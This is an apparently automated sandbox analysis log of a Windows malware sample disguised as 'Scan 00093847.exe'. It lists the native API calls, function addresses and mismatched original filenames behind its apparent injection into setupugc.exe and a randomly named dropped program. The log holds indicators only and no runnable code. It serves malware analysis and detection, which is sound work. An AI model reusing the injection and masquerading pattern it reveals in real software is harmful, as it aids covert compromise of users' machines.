            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03BC2DF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2DD0 NtDelayExecution,LdrInitializeThunk,9_2_03BC2DD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03BC2D30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03BC2D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03BC2CA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03BC2C70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2C60 NtCreateKey,LdrInitializeThunk,9_2_03BC2C60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC35C0 NtCreateMutant,LdrInitializeThunk,9_2_03BC35C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC39B0 NtGetContextThread,LdrInitializeThunk,9_2_03BC39B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2B80 NtQueryInformationFile,9_2_03BC2B80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2AB0 NtWaitForSingleObject,9_2_03BC2AB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2FA0 NtQuerySection,9_2_03BC2FA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2F90 NtProtectVirtualMemory,9_2_03BC2F90
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2F60 NtCreateProcessEx,9_2_03BC2F60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2EA0 NtAdjustPrivilegesToken,9_2_03BC2EA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2E30 NtWriteVirtualMemory,9_2_03BC2E30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2DB0 NtEnumerateKey,9_2_03BC2DB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2D00 NtSetInformationFile,9_2_03BC2D00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2CF0 NtOpenProcess,9_2_03BC2CF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2CC0 NtQueryVirtualMemory,9_2_03BC2CC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2C00 NtQueryInformationProcess,9_2_03BC2C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC3090 NtSetValueKey,9_2_03BC3090
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC3010 NtOpenDirectoryObject,9_2_03BC3010
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC3D10 NtOpenProcessToken,9_2_03BC3D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC3D70 NtOpenThread,9_2_03BC3D70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03279230 NtDeleteFile,9_2_03279230
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032792D0 NtClose,9_2_032792D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03279140 NtReadFile,9_2_03279140
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03279430 NtAllocateVirtualMemory,9_2_03279430
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03278FD0 NtCreateFile,9_2_03278FD0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_013FDC740_2_013FDC74
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_05417BC80_2_05417BC8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_054100400_2_05410040
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_054100060_2_05410006
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_05417BB80_2_05417BB8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A7A7B80_2_07A7A7B8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A7A7C80_2_07A7A7C8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A795280_2_07A79528
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A795190_2_07A79519
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A704A80_2_07A704A8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A7049A0_2_07A7049A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A790F00_2_07A790F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A7B0380_2_07A7B038
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A7AC000_2_07A7AC00
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A7ABF00_2_07A7ABF0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_004019D33_2_004019D3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_004185933_2_00418593
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_004030503_2_00403050
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_004100633_2_00410063
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0040E0E33_2_0040E0E3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0042EB933_2_0042EB93
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_004184D83_2_004184D8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_004024B03_2_004024B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0040FE433_2_0040FE43
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0040FE3B3_2_0040FE3B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0041677E3_2_0041677E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_004167833_2_00416783
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010801003_2_01080100
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112A1183_2_0112A118
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C516C3_2_010C516C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F1723_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0115B16B3_2_0115B16B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109B1B03_2_0109B1B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011501AA3_2_011501AA
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011481CC3_2_011481CC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C03_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113F0CC3_2_0113F0CC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114F0E03_2_0114F0E0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011470E93_2_011470E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114132D3_2_0114132D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114A3523_2_0114A352
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107D34C3_2_0107D34C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010D739A3_2_010D739A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011503E63_2_011503E6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E3F03_2_0109E3F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011302743_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010952A03_2_010952A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C03_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AD2F03_2_010AD2F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010905353_2_01090535
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011475713_2_01147571
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011505913_2_01150591
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112D5B03_2_0112D5B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114F43F3_2_0114F43F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011424463_2_01142446
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010814603_2_01081460
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113E4F63_2_0113E4F6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B47503_2_010B4750
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010907703_2_01090770
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114F7B03_2_0114F7B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108C7C03_2_0108C7C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011416CC3_2_011416CC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AC6E03_2_010AC6E0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010999503_2_01099950
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB9503_2_010AB950
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A69623_2_010A6962
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010929A03_2_010929A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0115A9A63_2_0115A9A6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD8003_2_010FD800
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010928403_2_01092840
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109A8403_2_0109A840
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010768B83_2_010768B8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010938E03_2_010938E0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE8F03_2_010BE8F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114AB403_2_0114AB40
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114FB763_2_0114FB76
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AFB803_2_010AFB80
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01146BD73_2_01146BD7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01105BF03_2_01105BF0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010CDBF93_2_010CDBF9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01147A463_2_01147A46
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114FA493_2_0114FA49
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01103A6C3_2_01103A6C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108EA803_2_0108EA80
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010D5AA03_2_010D5AA0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112DAAC3_2_0112DAAC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113DAC63_2_0113DAC6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109AD003_2_0109AD00
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01093D403_2_01093D40
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01141D5A3_2_01141D5A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01147D733_2_01147D73
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A8DBF3_2_010A8DBF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AFDC03_2_010AFDC0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108ADE03_2_0108ADE0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01090C003_2_01090C00
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01109C323_2_01109C32
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130CB53_2_01130CB5
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114FCF23_2_0114FCF2
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01080CF23_2_01080CF2
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114FF093_2_0114FF09
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010D2F283_2_010D2F28
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B0F303_2_010B0F30
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01104F403_2_01104F40
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091F923_2_01091F92
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114FFB13_2_0114FFB1
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01082FC83_2_01082FC8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114EE263_2_0114EE26
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01090E593_2_01090E59
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114CE933_2_0114CE93
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A2E903_2_010A2E90
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01099EB03_2_01099EB0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114EEDB3_2_0114EEDB
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_04327CA58_2_04327CA5
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_04327CAD8_2_04327CAD
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_0432E5E88_2_0432E5E8
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_0432E5ED8_2_0432E5ED
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_04327ECD8_2_04327ECD
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_04325F4D8_2_04325F4D
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_043469FD8_2_043469FD
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C503E69_2_03C503E6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B9E3F09_2_03B9E3F0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4A3529_2_03C4A352
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C102C09_2_03C102C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C302749_2_03C30274
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C481CC9_2_03C481CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C501AA9_2_03C501AA
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C181589_2_03C18158
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B801009_2_03B80100
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C2A1189_2_03C2A118
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C220009_2_03C22000
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B8C7C09_2_03B8C7C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B907709_2_03B90770
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BB47509_2_03BB4750
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BAC6E09_2_03BAC6E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C505919_2_03C50591
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B905359_2_03B90535
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C3E4F69_2_03C3E4F6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C424469_2_03C42446
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C46BD79_2_03C46BD7
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4AB409_2_03C4AB40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B8EA809_2_03B8EA80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B929A09_2_03B929A0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C5A9A69_2_03C5A9A6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BA69629_2_03BA6962
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B768B89_2_03B768B8
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BBE8F09_2_03BBE8F0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B928409_2_03B92840
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B9A8409_2_03B9A840
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C0EFA09_2_03C0EFA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B82FC89_2_03B82FC8
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C04F409_2_03C04F40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BB0F309_2_03BB0F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BD2F289_2_03BD2F28
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4EEDB9_2_03C4EEDB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BA2E909_2_03BA2E90
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4CE939_2_03C4CE93
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B90E599_2_03B90E59
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4EE269_2_03C4EE26
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BA8DBF9_2_03BA8DBF
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B8ADE09_2_03B8ADE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B9AD009_2_03B9AD00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C2CD1F9_2_03C2CD1F
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B80CF29_2_03B80CF2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C30CB59_2_03C30CB5
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B90C009_2_03B90C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BD739A9_2_03BD739A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4132D9_2_03C4132D
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B7D34C9_2_03B7D34C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B952A09_2_03B952A0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C312ED9_2_03C312ED
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BAD2F09_2_03BAD2F0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BAB2C09_2_03BAB2C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B9B1B09_2_03B9B1B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C5B16B9_2_03C5B16B
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B7F1729_2_03B7F172
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC516C9_2_03BC516C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C3F0CC9_2_03C3F0CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4F0E09_2_03C4F0E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C470E99_2_03C470E9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B970C09_2_03B970C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4F7B09_2_03C4F7B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C416CC9_2_03C416CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C2D5B09_2_03C2D5B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C475719_2_03C47571
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B814609_2_03B81460
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4F43F9_2_03C4F43F
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C05BF09_2_03C05BF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BAFB809_2_03BAFB80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BCDBF99_2_03BCDBF9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4FB769_2_03C4FB76
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C3DAC69_2_03C3DAC6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BD5AA09_2_03BD5AA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C2DAAC9_2_03C2DAAC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C47A469_2_03C47A46
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4FA499_2_03C4FA49
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C03A6C9_2_03C03A6C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C259109_2_03C25910
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B999509_2_03B99950
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BAB9509_2_03BAB950
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B938E09_2_03B938E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BFD8009_2_03BFD800
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B91F929_2_03B91F92
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4FFB19_2_03C4FFB1
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4FF099_2_03C4FF09
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B99EB09_2_03B99EB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BAFDC09_2_03BAFDC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C41D5A9_2_03C41D5A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C47D739_2_03C47D73
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B93D409_2_03B93D40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C4FCF29_2_03C4FCF2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03C09C329_2_03C09C32
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03261C409_2_03261C40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032652D09_2_032652D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032634BB9_2_032634BB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032634C09_2_032634C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0325CB789_2_0325CB78
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0325CB809_2_0325CB80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0327B8D09_2_0327B8D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0325AE209_2_0325AE20
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0325CDA09_2_0325CDA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0397E5639_2_0397E563
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0397E4489_2_0397E448
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0397D9689_2_0397D968
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0397E8FC9_2_0397E8FC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 03BC5130 appears 57 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 03B7B970 appears 257 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 03BFEA12 appears 86 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 03C0F290 appears 103 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 03BD7E54 appears 98 times
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: String function: 0110F290 appears 103 times
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: String function: 010C5130 appears 36 times
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: String function: 010FEA12 appears 86 times
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: String function: 0107B970 appears 250 times
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: String function: 010D7E54 appears 88 times
            Source: Scan 00093847.exe, 00000000.00000000.1678731871.0000000000B86000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWYNp.exe< vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000000.00000002.1835046384.0000000000FAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000000.00000002.1845997380.0000000007590000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000000.00000002.1846818865.0000000007F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000000.00000002.1836424368.0000000003021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000000.00000002.1836888270.000000000411C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000003.00000002.2069978810.000000000117D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSETUPUGC.EXEj% vs Scan 00093847.exe
